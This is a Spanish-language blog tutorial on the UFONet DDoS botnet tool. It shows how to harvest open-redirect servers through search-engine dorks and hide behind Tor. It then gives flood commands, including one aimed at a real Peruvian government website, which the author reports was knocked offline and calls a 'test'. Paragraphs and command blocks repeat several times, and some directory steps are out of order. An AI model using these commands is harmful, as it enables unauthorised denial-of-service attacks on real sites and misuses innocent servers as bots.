ENVIANDO ATAQUES MASIVOS DE DDOS CON UFONET
Saludos mis fieles lectores en esta oportunidad les traigo la herramienta llamada "UFOnet" la cual funciona como una "Botnet" de distribución de denegación de servicio, en nuestro sistema operativo GNU/Linux recolectando fallos de servidores web con la vulnerabilidad "Open Redirect" la cual enviara varias peticiones con grandes paquetes a la pagina objetivo.
http://cwe.mitre.org/data/definitions/601.html
http://cwe.mitre.org/data/definitions/601.html
Descarga
root@kali:~# git clone https://github.com/epsylon/ufonet
root@kali:~# cd ufonet
root@kali:~/ufonet# ls
root@kali:~/ufonet# cd ufonet
root@kali:~# ./ufonet
root@kali:~/ufonet# cd ufonet
root@kali:~# ./ufonet
una ves descargado y comprobado que todo salio exitoso, vamos a configurar nuestro servidor añadiendo algunas configuraciones pero antes vamos a explicar algunos métodos que consta dicha herramienta.
Busqueda de Boots
como sabrán esta herramienta consta de una búsqueda de indexiaciones por medio de "Dorks" donde vamos a encontrar parámetros GET que son vulnerables para realizar este tipo de ataques como son:
- 'check.cgi?url='
- 'proxy.php?url='
- 'validator?uri='
- 'checklink?uri='
Al realizar dichas consultas vamos a encontrarnos que el buscador por defauld es "duck", pero también podemos añadir otros parámetros para añadir otros buscadores como lo son bing, google, yahoo, yandex, etc, como son las siguientes:
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'bing'
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'google'
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'yahoo'
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'yandex'
pero si deseamos hacer una búsqueda avanzada de las DORKS en general que contiene el repertorio de ufonet podemos hacer una búsqueda estándar para añadir mas paginas vulnerables las cuales son las siguientes:
root@kali:~/ufonet/ufonet# ./ufonet --sd 'dorks.txt'
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'bing'
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'google'
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'yahoo'
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'yandex'
pero si deseamos hacer una búsqueda avanzada de las DORKS en general que contiene el repertorio de ufonet podemos hacer una búsqueda estándar para añadir mas paginas vulnerables las cuales son las siguientes:
root@kali:~/ufonet/ufonet# ./ufonet --sd 'dorks.txt'
como pueden observar esta elaborando una búsqueda general de todas las Dorksencontradas en dicho documento de texto, donde rápidamente se guardara en un archivo llamado "Zombies.txt.
Pero si deseamos tener una conexión anónima en este caso con un proxy que se directamente con ufonet esta implementado Tor, la cual podemos ejecutarlo de la siguiente manera.
./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:9150"
Si no lo tienen instalado pueden ver el siguiente tutorial donde enseño como configurar lo para Kali.
http://backtrack-omar.blogspot.pe/2015/09/instalar-tor-browser-en-kali-linux-20-y.html
Bueno primero que nada, vamos a ejecutar algunas conexiones defauld de pruebas de ataques para cargar el servidor y ver algunas peticiones que constan varias variaciones de estructuras, lo que haremos sera ejecutar un comando para obtener una búsqueda relacionada a una DORK como es la siguiente:
Pero si deseamos tener una conexión anónima en este caso con un proxy que se directamente con ufonet esta implementado Tor, la cual podemos ejecutarlo de la siguiente manera.
./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:9150"
Si no lo tienen instalado pueden ver el siguiente tutorial donde enseño como configurar lo para Kali.
http://backtrack-omar.blogspot.pe/2015/09/instalar-tor-browser-en-kali-linux-20-y.html
Bueno primero que nada, vamos a ejecutar algunas conexiones defauld de pruebas de ataques para cargar el servidor y ver algunas peticiones que constan varias variaciones de estructuras, lo que haremos sera ejecutar un comando para obtener una búsqueda relacionada a una DORK como es la siguiente:
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url='
luego de ello vamos a ejecutar el siguiente comando para cargar los módulos de los servicios web vulnerables
root@kali:~/ufonet/ufonet# ./ufonet -i http://target.com
luego de ello vamos a ejecutar el siguiente comando para cargar los módulos de los servicios web vulnerables
root@kali:~/ufonet/ufonet# ./ufonet -i http://target.com
como vemos los archivos están siendo cargados de manera exitosa en nuestro servidor local, pero también podemos ejecutar el siguiente comando para elaborar un TEST en el siguiente servicio.
root@kali:~/ufonet/ufonet# ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"
root@kali:~/ufonet/ufonet# ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"
sin duda este ataque es muy efectivo ya que va realizar consultas con las listas mas grandes que puede ver en el servidor y es uno de los mas efectos, pero también podemos ejecutar el siguiente que es aun mas prodigioso si es que se ha configurado bien el buscador de web's vulnerables, si deseamos lanzar un ataque mediante las conexiones de envíos por defauld podemos añadir lo siguiente:
root@kali:~/ufonet/ufonet# ./ufonet -a http://www.peru.gob.pe -r 10 -v
root@kali:~/ufonet/ufonet# ./ufonet -a http://www.peru.gob.pe -r 10 -v
como vemos primero nos carga los paquetes de envios de las cabeceras, como acabamos de ver, pero al terminar lo siguiente, empezaremos a enviar las peticiones de acuerdo al tipo de threads que hemos realizado, como en mi caso fue 10, se ara una petición de 10 repeticiones:
como vemos en la siguiente imagen la herramienta consta de una website muy conocida llamada "downforeveryoneorjustme", donde nos dirá, si la web esta Down o UP como vemos nos dice que esta down o caída.
pero como siempre es bueno hecha ojo en los servicios paso a verificarlo:
Lo interesante es los paquetes que enviá y la respuesta que recibe.
entonces el Test del servidor se ha realizado correctamente. espero les aya gustado este POST.
Saludos!
Saludos!
gracias a mi amigo Omar Rodriguez